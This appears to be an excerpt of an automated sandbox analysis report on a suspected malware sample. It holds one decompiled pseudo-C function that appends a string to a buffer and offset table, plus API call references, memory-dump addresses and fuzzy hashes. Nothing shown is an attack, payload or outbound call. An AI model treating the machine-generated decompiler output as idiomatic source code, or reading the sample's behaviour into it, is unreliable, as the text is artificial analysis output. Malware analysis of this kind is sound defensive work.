                                                                        • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                        • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406A74(void* __eax, void* __ecx, char* _a4) {
                                                                        				int _v8;
                                                                        				void* __edi;
                                                                        				int _t27;
                                                                        				intOrPtr _t28;
                                                                        				intOrPtr _t31;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t52;
                                                                        				void** _t55;
                                                                        				void** _t56;
                                                                        				void* _t59;
                                                                        
                                                                        				_t59 = __eax;
                                                                        				_t27 = strlen(_a4);
                                                                        				_t42 =  *((intOrPtr*)(_t59 + 4));
                                                                        				_t52 = _t42 + _t27 + 1;
                                                                        				_v8 = _t27;
                                                                        				_t28 =  *((intOrPtr*)(_t59 + 0x14));
                                                                        				 *((intOrPtr*)(_t59 + 4)) = _t52;
                                                                        				_t55 = _t59 + 0x10;
                                                                        				if(_t52 != 0xffffffff) {
                                                                        					E004060FA(_t59, _t52, _t55, 1, _t28);
                                                                        				} else {
                                                                        					free( *_t55);
                                                                        				}
                                                                        				_t53 =  *(_t59 + 0x1c);
                                                                        				_t31 =  *((intOrPtr*)(_t59 + 0x18));
                                                                        				_t56 = _t59 + 0xc;
                                                                        				if( *(_t59 + 0x1c) != 0xffffffff) {
                                                                        					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
                                                                        				} else {
                                                                        					free( *_t56);
                                                                        				}
                                                                        				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
                                                                        				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
                                                                        				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
                                                                        				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
                                                                        				_t25 =  *(_t59 + 0x1c) - 1; // -1
                                                                        				return _t25;
                                                                        			}

                                                                        APIs
                                                                        • strlen.MSVCRT ref: 00406A80
                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                          • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                          • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                          • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,73B74DE0,00406B49,00000001,?,00000000,73B74DE0,00406D88,00000000,?,?), ref: 00406137
                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                        • memcpy.MSVCRT ref: 00406AE3
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: free$memcpy$mallocstrlen
                                                                        • String ID:
                                                                        • API String ID: 3669619086-0
                                                                        • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                        • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                        • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                        • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%